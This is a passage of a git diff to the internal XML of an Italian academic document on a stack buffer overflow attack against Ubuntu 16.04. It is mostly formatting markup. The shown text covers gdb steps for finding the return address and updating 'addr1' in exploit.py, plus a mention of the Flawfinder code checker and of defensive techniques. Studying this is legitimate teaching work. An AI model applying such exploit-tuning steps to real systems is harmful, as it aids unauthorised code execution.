-          <w:numId w:val="10"/>
-        </w:numPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Se la console ritorna “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Illegal</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>instruction</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>” oppure “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Segmentation</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Fault”:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Controllare se il Return </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Address</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dello </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>stack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> è cambiato, quindi controllare se “addr1” è uguale a quello nel file </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Py</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> exploit. Se è diverso, aggiornarlo e rieseguire il file exploit.py</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="Grigliatabella"/>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9628"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="397"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9628" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="nil"/>
-              <w:left w:val="nil"/>
-              <w:bottom w:val="nil"/>
-              <w:right w:val="nil"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>gdb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>stack_dbg</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>gdb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>) b foo</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>gdb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>) run</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>gdb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">) </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-              <w:t>p $</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-              <w:t>ebp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-              <w:t xml:space="preserve">---&gt; addr1: </w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9778,6 +9887,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">5) </w:t>
       </w:r>
       <w:r>
@@ -11020,6 +11130,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="475D7349"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="0B3E95AA"/>
+    <w:lvl w:ilvl="0" w:tplc="04100001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="50AF21C0"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6D8AABA4"/>
@@ -11108,7 +11331,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="64F60782"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6C4C38E0"/>
@@ -11221,7 +11444,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6E272112"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CEBA3B44"/>
@@ -11307,7 +11530,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="701A5D3C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="21CE4578"/>
@@ -11420,7 +11643,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="749C5B04"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E92E2160"/>
@@ -11533,7 +11756,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="75546138"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C406D0C0"/>
@@ -11626,10 +11849,10 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="6"/>
@@ -11647,25 +11870,28 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="11">
     <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="12">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="13">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="14">
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="15">
     <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="16">
+    <w:abstractNumId w:val="9"/>
   </w:num>
 </w:numbering>
 </file>
@@ -12094,6 +12320,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Carpredefinitoparagrafo">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Tabellanormale">

--- a/Documentation/Documentation.docx
+++ b/Documentation/Documentation.docx
@@ -730,16 +730,6 @@
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -803,6 +793,58 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Flawfinder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tester</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> per esaminare il codice</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -900,7 +942,7 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve">verflow su una macchina ospitate Linux, in particolare </w:t>
+        <w:t xml:space="preserve">verflow su una macchina Linux, </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -916,21 +958,70 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 16.04. Non solo questo progetto va ad analizzare e discutere i fattori principali di un attacco di questo genere, ma va</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a documentare e spiegare nel dettaglio </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>un’implementazione pratica dell’attacco. Infine, sono stati riportate anche tecniche e tool che potrebbero aiutare gli utenti a fronteggiare una vulnerabilità di questo tipo sulla propria macchina.</w:t>
+        <w:t xml:space="preserve"> 16.04. Non solo questo progetto va ad analizzare e discutere i fattori principali di un attacco di questo genere,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ma va anche a documentare </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nel dettaglio </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>un’implementazione pratica dell’attacco. Infine, sono stat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">e </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>riportate</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">tecniche e tool che potrebbero aiutare gli utenti a fronteggiare una vulnerabilità di questo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>genere</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
